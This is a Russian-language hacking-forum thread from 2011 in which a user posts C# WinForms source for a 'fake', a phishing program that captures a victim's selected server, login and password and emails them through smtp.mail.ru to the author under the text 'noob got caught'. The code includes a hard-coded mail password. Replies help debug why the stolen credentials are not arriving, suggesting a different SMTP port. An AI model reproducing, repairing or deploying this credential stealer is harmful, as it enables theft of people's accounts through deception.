PDA

Просмотр полной версии : Почему не отпровляется письмо на мыло


Хам!!!
04.03.2011, 15:27
При создании фейка всё проходить хорошо не одной ошибки не было. Когда запускаю свой фейк на почту нечего не приходит у меня XP SP3
P.S знаю что не меня одного этот вопрос волнует так что не мне одному поможете, в долгу не останимся)
вот сылка ([Ссылки могут видеть только зарегистрированные и активированные пользователи]) на исходник фейка
вот код

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Net;
using System.Net.Mail;

namespace WindowsFormsApplication11
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}

private void button1_Click(object sender, EventArgs e)
{
SmtpClient client = new SmtpClient("smtp.mail.ru", 587); // Здесь указываем смтп сервер и порт, который мы будем использовать
client.Credentials = new System.Net.NetworkCredential("[Ссылки могут видеть только зарегистрированные и активированные пользователи]", "1221938q"); // Указываем логин и пароль для авторизации

string msgFrom = "[Ссылки могут видеть только зарегистрированные и активированные пользователи]"; // Указываем поле, от кого письмо
string msgTo = "[Ссылки могут видеть только зарегистрированные и активированные пользователи]"; // Указываем поле, кому письмо будет отправлено
string msgSubject = "Письмо из c#"; // Указываем тему пиьсма

string msgBody = String.Format("Нубик попался :-)\n\nСервер: {0}\nЛогин: {1}\nПароль: {2}",
comboBox1.SelectedItem.ToString(), textBox1.Text, textBox2.Text, textBox3); // Тут мы формируем тело письма, передаем выбранный сервер, логин и пароль

MailMessage msg = new MailMessage(msgFrom, msgTo, msgSubject, msgBody); // Создаем письмо, из всего, что сделали выше

try
{
client.Send(msg); // Отправляем письмо
}
catch { }
}

private void textBox1_TextChanged(object sender, EventArgs e)
{

}

private void textBox2_TextChanged(object sender, EventArgs e)
{

}

private void comboBox1_SelectedIndexChanged(object sender, EventArgs e)
{

}

private void textBox3_TextChanged(object sender, EventArgs e)
{

}


}
}



:bow:

Gold-90
07.03.2011, 12:16
гыыы. Сразу по твоей ссылке каспер ругается. Хотя у меня такой же код и такая же проблема, но каспер не ругается

Fiery Dragon
07.03.2011, 14:23
1)[Ссылки могут видеть только зарегистрированные и активированные пользователи] - Отсылка e-mail через C#
2) SmtpClient client = new SmtpClient("smtp.mail.ru", 587) может я чего не знаю,но обычно порт 25